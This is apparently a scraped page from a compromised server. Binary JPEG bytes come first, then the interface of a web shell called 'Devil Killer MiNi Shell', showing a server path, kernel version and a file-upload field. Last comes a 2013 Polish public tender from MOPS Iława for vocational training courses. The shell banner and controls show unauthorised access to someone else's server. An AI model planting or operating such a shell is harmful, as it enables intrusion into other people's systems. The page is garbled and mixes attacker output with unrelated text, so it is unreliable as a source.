JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130912/370786-N-2013.html

<p class="kh_header"><b>Iława: Realizacja usługi o udzielenie szkoleń zawodowych i kursów dla uczestników i uczestniczek projektu pn. Masz Okazję - Pomóż Sobie w roku 2013 współfinansowanego przez UE w ramach EFS</b><br>
<b>Numer ogłoszenia: 370786 - 2013; data zamieszczenia: 12.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Grunwaldzka 6a, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6484124, faks 89 6499711.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa - ośrodek pomocy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usługi o udzielenie szkoleń zawodowych i kursów dla uczestników i uczestniczek projektu pn. Masz Okazję - Pomóż Sobie w roku 2013 współfinansowanego przez UE w ramach EFS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy przeprowadzenia usługi szkoleń zawodowych i kursów dla uczestników i uczestniczek projektu pn. Masz Okazję - Pomóż Sobie w roku 2013 współfinansowanego przez UE w ramach EFS dla 47 podopiecznych MOPS w Iławie. W pierwszym terminie odbędą się szkolenia zawodowe, w których weźmie udział 36 osób oraz kurs języka angielskiego dla początkujących. Po zakończeniu szkoleń zawodowych powinny rozpocząć się kursy: komputerowy, własny wizerunek, przygotowanie do życia w rodzinie. Zajęcia powinny się odbywać według harmonogramu (załącznik nr 9). Uczestnicy i uczestniczki projektu zostaną podzieleni na grupy, język angielski podział na dwie grupy (I grupa zajęcia do godziny 16:00, II grupa zajęcia po godzinie 16:00), kurs własny wizerunek podział na dwie grupy (I grupa zajęcia do godziny 16:00, II grupa zajęcia po godzinie 16:00), kurs komputerowy podział na dwie grupy (I grupa zajęcia do godziny 16:00, II grupa zajęcia po godzinie 16:00), kurs Przygotowanie do życia w rodzinie I grupa do godziny 16:00. Czas zajęć liczony jest następująco - 1h = 45 min, po każdej godzinie powinna odbyć się 5 lub 10 minutowa przerwa, w tym jedna przerwa na catering 15 lub 20 minutowa.





Lp.	Wyszczególnienie	Liczba godzin	Koszt 
- metodologia wyliczenia
I	szkolenia zawodowe, kurs językowy, kurs komputerowy
47 osób
 + catering,
+ materiały
		Suma pozycji 1-9


1	Wózki jezdniowe: 3 osób Tematyka: celem szkolenia jest przygotowanie uczestników kursu do samodzielnej obsługi wózków jezdniowych podnośnikowych i platformowych oraz do bezpiecznej wymiany butli gazowych w wózkach napędzanych gazem. Szkolenie umożliwia uczestnikom zdobycie odpowiedniego zakresu wiadomości i umiejętności niezbędnych do złożenia egzaminu kwalifikacyjnego i uzyskania uprawnień do obsługi wózków jezdniowych podnośnikowych. Kurs obejmuje następujące zagadnienia: Przepisy ogólne i dokumentacja techniczna, Typy stosowanych wózków jezdniowych, Budowa wózków jezdniowych podnośnikowych i platformowych, Obowiązki i czynności operatora przy obsłudze wózków, Podstawy ładunkoznawstwa, Przepisy bhp i ppoż, Przygotowanie kierowcy do wykonywania czynności związanych z bezpieczną wymianą butli gazowych oraz zapoznanie z zasadami ich przechowywania. Praktyczna nauka jazdy i manewrowania osprzętem wózków.
	78h 
37 h teoria
41 h zajęcia praktyczne	Łączny koszt


2	Profesjonalny sprzedawca: 5 osób. Tematyka: towaroznawstwo, sprzedaż detaliczna i hurtowa, promocja w handlu, profesjonalna obsługa klienta, techniki sprzedażowe, dokumentacja obrotu towarowego, obsługa kasy fiskalnej.
	112 h 
68 h teoria
44 h zajęcia praktyczne	Łączny koszt


3	Handlowiec z prawem jazdy kat B, 12 osób Tematyka: elementy marketingu, towaroznawstwo, handel detaliczny i hurtowy, obsługa kas fiskalnych, minimum sanitarne, fakturowanie, kurs prawo jazdy kat. B
	110 h 
70 h teoria
40 h zajęcia praktyczne
	Łączny koszt


4	Pokojówka z podstawami języka angielskiego, 6 os. Tematyka: kurs przygotowuje do podjęcia pracy w ośrodkach branży turystycznej i innych instytucjach posiadających bazę noclegową i/lub konferencyjną. Obejmuje: zasady komunikacji z gośćmi (savoir vivre) i kreowania pozytywnego wizerunku hotelu, typologia i zastosowanie środków chemicznych, podstawowe technologie sprzątania, organizacja pracy przy sprzątaniu pokoju hotelowego i kolejność czynności, w tym procedury związane z wymianą bielizny hotelowej, kontrola prac porządkowo-sanitarnych, współpraca z innymi działami hotelu, bezpieczeństwo i higiena pracy w zakresie usług hotelarskich w kontekście prawodawstwa krajowego i wspólnotowego, podstawowe zwroty i słownictwo  w języku angielskim przydatne w pracy pokojówki. 
	120 h
60 h teoria
60 h zajęcia praktyczne	Łączny koszt


5	Kurs własny wizerunek (17 osób) Tematyka: dbanie o własny wygląd, ubiór i wizerunek, opanowanie wiadomości o typach kolorystycznych, typach sylwetek, fasonach ubrań, sposobach pielęgnowania urody oraz sztuce makijażu. Zdobycie elementarnych wiadomości dotyczących autoprezentacji i komunikacji niewerbalnej. Nabycie umiejętności rozpoznawania typów kolorystycznych, doboru odpowiednich fasonów i kolorów garderoby, pielęgnacji urody, wykonywania makijażu stosownego do typu kolorystycznego. Nabycie umiejętności korzystnej autoprezentacji.
	20 h na  2 grupy	Łączny koszt


6	Kurs komputerowy (18 osób) podstawy obsługi komputera dla początkujących (10h), obsługa programu MS Office Word 2010 (5h), Internet w życiu codziennym - obsługa konta bankowego online, poszukiwanie ofert pracy, korzystanie z serwisów lokalnych urzędów, korzystanie z rozkładu jazdy PKP (10h), przy czym Wykonawca zapewni taką ilość komputerów, by każdy uczestnik mógł pracować indywidualnie na swoim stanowisku
	26 h na 2gr.- zajęcia przy komputerach	Łączny koszt


7	Kurs języka angielskiego (2 grupy) dla początkujących 20 osób	46 h na dwie grupy	Łączny koszt


8	Kurs przygotowanie do życia w rodzinie (8                osób) Tematyka: zagrożenia i pułapki, tematyka bezpiecznego seksu, profilaktyka, życie seksualne młodzieży, inicjacja seksualna, pułapki współżycia seksualnego, bezpieczny seks, choroby weneryczne, HIV, konsekwencje współżycia bez środków zabezpieczających, możliwości antykoncepcyjne, ciąża w młodym wieku, nauka ról społecznych związanych z płcią (matka, ojciec, mąż, żona). 
	20 h jedna grupy	Łączny koszt


9	Szkolenie opiekunka osób chorych i starszych (10 osób) Tematyka: ma na celu wyposażenie uczestników w wiedzę i umiejętności w zakresie opieki nad chorymi przewlekle. Anatomia i fizjologia człowieka, pierwsza pomoc, radzenie sobie ze stresem, techniki pomiaru podstawowych parametrów życiowych, podstawowe zasady higieny, higiena żywienia człowieka, pielęgnacja ran przewlekłych, pielęgnowanie i rehabilitacja po zabiegach operacyjnych, metodyka organizacji czasu wolnego 
	120 h 
67 h teoria
53 h zajęcia praktyczne	Łączny koszt



2. Oznaczenie wg Wspólnego Słownika Zamówień Kody CPV: 80530000-8 usługi szkoleń zawodowych, 8053200-1 kursy komputerowe, 80570000-0 usługi szkolenia w dziedzinie rozwoju osobistego, 80580000-3 oferowanie kursów językowych.






3. Zamawiający zastrzega sobie, że zajęcia teoretyczne i kursy będą odbywały się na terenie miasta Iławy, w jednym budynku, by zapobiec dezorganizacji szkoleń i uzyskać jak najwyższą frekwencję uczestników i uczestniczek biorących udział w projekcie oraz by zapewnić systematyczny nadzór ze strony Zamawiającego. Szkolenia powinny odbywać się w pomieszczeniach oddzielnych (zamykanych), by kursanci dwóch różnych szkoleń nie przeszkadzali sobie nawzajem. Uczestnikom powinny być zapewnione sale o powierzchni gwarantującej ergonomiczny sposób przeprowadzenia zajęć oraz ogrzane w sezonie grzewczym. Zajęcia praktyczne lub symulacyjne (poza prawem jazdy) będą odbywały się na terenie miasta Iławy w miejscach wskazanych przez Wykonawcę i zaakceptowanych przez Zamawiającego. 
Kurs prawo jazdy - będzie realizowany w szkole nauki jazdy wskazanej przez Wykonawcę na terenie miasta Iławy, natomiast nauka jazdy wg wskazań Wykonawcy 
4. Szkolenie zawodowe musi odbywać się zgodnie z planem nauczania. Zajęcia teoretyczne i symulacje nie powinny trwać dłużej niż do godziny 16:00. 
5. Kursy , które będą się rozpoczynać po godzinie 16:00 nie powinny trwać dłużej niż do godziny 19:00. Ponadto uczestniczy i uczestniczki biorący udział w Projekcie Masz Okazję - Pomóż Sobie, mieli możliwość zapisania się na kilka kursów, wobec powyższego Wykonawca musi tak stworzyć harmonogram zajęć, aby umożliwić uczestnikom udział w kilku kursach.
6. Wykonawca składa też preliminarz kosztów szkolenia zawarty w kartach szkoleń (załącznik nr 5) z wyspecyfikowaniem: ogólnego kosztu szkolenia, kosztów szkolenia z uwzględnieniem zmniejszenia ilości uczestników (co jedną osobę), wydatków na materiały, badania, odzież itp. wykorzystywane w trakcie szkolenia, wysokość narzutu i zysku, innych wydatków związanych z organizacją i prowadzeniem kursu np. koszty wynajmu sal, sprzętu itp. oraz uroczystego zakończenia szkoleń.
7. Wymagane jest złożenie oświadczenia przez Wykonawcę o zapewnieniu sal wykładowych i zaplecza dydaktycznego (wg załącznika nr 6).
8. Pozostałe warunki jakie należy wziąć pod uwagę przy opracowywaniu formularza ofertowego, programu szkolenia (kursu) oraz jego organizacji: 
- ilość godzin teoretycznych szkolenia nie powinna przekroczyć 6 godzin w ciągu dnia
- należy zapewnić osobom catering na czas trwania szkolenia (kursu) składający się z kawy, herbaty, soków, wody mineralnej, ciastek kruchych i ciastek czekoladowych; 
- należy zapewnić uczestnikom i uczestniczkom zajęć materiały szkoleniowe z logo EFS dla wszystkich uczestników i uczestniczek (teczka, długopis, zeszyt) oraz w temacie każdego ze szkoleń Wykonawca zapewnia co najmniej 1 publikację, podręcznik lub książkę.
- Wykonawca zobowiązany jest do ubezpieczenia od nieszczęśliwych wypadków wszystkie osoby biorące udział w szkoleniach (od pierwszego do ostatniego dnia szkolenia).
- Wykonawca zapewni warunki zgodne z przepisami BHP w trakcie trwania szkolenia,
- Wykonawca pokryje koszty niezbędnych, wymaganych badań lekarskich (jeżeli specyfika szkolenia tego wymaga). Koszt badań, wyrobienia książeczki zdrowia itp. należy ująć w cenie kursu.
- Wykonawca pokryje koszt zakupu odzieży ochronnej (jeżeli specyfika szkolenia tego wymaga). Koszt ten należy ująć w cenie kursu.
- Wykonawca ujmie w cenie kursu też koszt uroczystego zakończenia szkoleń związanego z rozdaniem zaświadczeń, certyfikatów lub dyplomów (w koszt należy wliczyć: salę z zapewnieniem miejsc siedzących dla 47 osób, oraz poczęstunek - w formie kawy, herbaty, wody mineralnej, kanapek z szynką, serem, pomidorem i ogórkiem - min. po 2 kanapki na osobę, ciasto sernik - min. po 1 kawałku na osobę i ciasto jabłecznik - min. po 1 kawałku na osobę). 
- należy przeprowadzić ankietę ewaluacyjną na początku i na końcu szkoleń.






- Wykonawca jest zobowiązany do promocji Europejskiego Funduszu Społecznego poprzez oznaczenia pomieszczeń, w których realizowany jest projekt oraz materiałów szkoleniowych zgodnie z  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczonymi na stronie internetowej: www.efs.gov.pl lub www.mrr.gov.pl lub www.funduszestrukturalne.gov.pl.
- należy na bieżąco informować Zamawiającego o przypadkach nieobecności osób na szkoleniu w trakcie jego trwania
- należy zapewnić możliwość kontroli przebiegu szkolenia uprawnionemu pracownikowi MOPS w Iławie
- należy przekazać Zamawiającemu po zakończeniu szkolenia sprawozdanie końcowe, które będzie zawierało informacje o usługach świadczonych przez Wykonawcę w całym okresie realizacji usługi (oryginały list obecności uczestników i uczestniczek szkoleń, imiennego wykazu osób, które nie ukończyły szkolenia, kserokopii zaświadczeń (lub innych dokumentów) świadczących o ukończeniu szkolenia, 
kserokopii dziennika zajęć,  po jednym egzemplarzu materiałów, publikacji używanej podczas szkoleń)
 - szkolenie winno zakończyć się oceną nabytych umiejętności i wydaniem zaświadczenia, certyfikatu lub dyplomu o jego ukończeniu zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z dnia 27 lutego 2006 r.)
- jednostka szkoleniowa zobowiązana jest każde szkolenie/kurs/zajęcia wpisać do bazy  na portalu rządowym http://www.inwestycjawkadry.info.pl/. 
9. Wykonawca zobowiązuje się do przedłożenia, w dniu podpisania umowy, harmonogramu szkolenia.
10. Listy osób przypisanych do określonych grup zostaną przedłożone Wykonawcy najpóźniej w dniu podpisaniu umowy przez pracownika MOPS w Iławie.
11. Wykonawca zobowiązuje się zakończyć szkolenia do dnia 16 grudnia 2013, uroczyste zakończenie do dnia 20 grudnia 2013 r...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.58.00.00-3, 80.53.32.00-1, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający żąda, by Wykonawca dołączył do oferty wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - załącznik nr 4. Warunek ten będzie uznany za spełniony, w przypadku gdy Wykonawca wykaże, że przeprowadził co najmniej 1 szkolenie w zakresie zgodnym z kierunkiem każdego zamawianego szkolenia w wymienionym okresie czasu. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku posiadania do dyspozycji potencjału technicznego Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz, że dysponuje potencjałem technicznym do wykonania zamówienia oraz oświadczenie o dysponowaniu salami dydaktycznymi - zgodnie z załącznikiem nr 6 do siwz. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający żąda, by wykonawca dołączył do oferty oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do siwz, 
2) oferta wraz z załącznikami musi być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, W przypadku przedsiębiorcy zgodnie z zasadami reprezentacji wskazanymi we właściwym 
rejestrze (np. w ewidencji działalności gospodarczej). Do oferty należy dołączyć dokument lub pełnomocnictwo, z którego wynika uprawnienie osoby (osób) do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli prawo to nie wynika z rejestru. W takiej sytuacji dokument lub pełnomocnictwo muszą być integralną częścią oferty. 
3) oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy (w przypadku oferty składanej wspólnie przez kilku Wykonawców, oświadczenie składa każdy wykonawca) z wykorzystaniem wzoru - załącznik nr 2 do siwz, 
4) oświadczenie dotyczące podwykonawców - załącznik nr 7 do siwz.
5) oświadczenie o dysponowaniu salami dydaktycznymi - załącznik nr 6 do siwz
6) Karta Szkolenia - załącznik nr 5 do siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy w sprawie zamówienia publicznego co do zakresu zadania, kadry dydaktycznej, ceny i terminu oraz osób prowadzących zajęcia może nastąpić na umotywowany pisemny wniosek jednej ze stron umowy po uzyskaniu zgody drugiej strony w formie aneksu z zachowaniem formy pisemnej w następujących przypadkach:



a) zmniejszenia liczby osób i kosztu szkolenia, w przypadku rezygnacji uczestników i uczestniczek szkoleń
b) zwiększenia liczby osób i kosztu szkolenia, gdyby uczestnik lub uczestniczka szkolenia zgłosiła nieoczekiwaną chęć wzięcia udziału w kursie
c) miejsca szkolenia, w przypadku, gdy Wykonawca zaproponuje lepsze warunki lokalowe wymienione w ofercie, w przypadku awarii sali szkoleniowej lub budynku uniemożliwiającej przeprowadzenie zajęć lub kiedy umowa między Wykonawcą a właścicielem sali przeznaczonej na szkolenie zostanie rozwiązana z przyczyn nie lezących po stronie wykonawcy.
